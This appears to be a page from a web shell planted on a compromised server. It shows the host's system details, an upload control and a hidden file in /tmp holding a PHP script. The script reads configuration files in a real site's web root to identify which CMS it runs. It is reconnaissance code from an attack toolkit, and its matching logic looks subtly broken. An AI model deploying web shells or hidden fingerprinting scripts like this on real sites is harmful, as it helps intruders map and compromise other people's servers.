HEX
Server: nginx/1.26.1
System: Linux 850a3e23ecee 5.15.0-122-generic #132-Ubuntu SMP Thu Aug 29 13:45:52 UTC 2024 x86_64
User: (1000)
PHP: 8.2.27
Disabled: NONE
Upload Files
File: //proc/thread-self/root/tmp/.uconvert
<?php   $r = '/www/wwwroot/goprint.vn/public_html'; $a = ['wp-config.php' => ['DB_PASSWORD' => 'wp'], 'index.php' => ['@package    Joomla.Site' => 'joomla', 'DRUPAL_ROOT' => 'drupal', 'use Magento\Framework\App\Bootstrap' => 'magento'], 'configuration.php' => ['JConfig' => 'joomla'], 'cron.php' => ['DRUPAL_ROOT' => 'drupal', 'Magento\Store\Model' => 'magento'], 'init.php' => ['Copyright since 2007 PrestaShop' => 'prestashop'], 'config.php' => ["define('DIR_APPLICATION'" => 'opencart']];  foreach ($a as $path => $patterns) {     $t = "{$r}/{$path}";     if (file_exists($t)) {         $c = file_get_contents($t);         foreach ($patterns as $p => $cms) {             if(strstr($c, $cms)) {                 die("<c>{$cms}</c>");             }         }     } } die('<c>unknown</c>');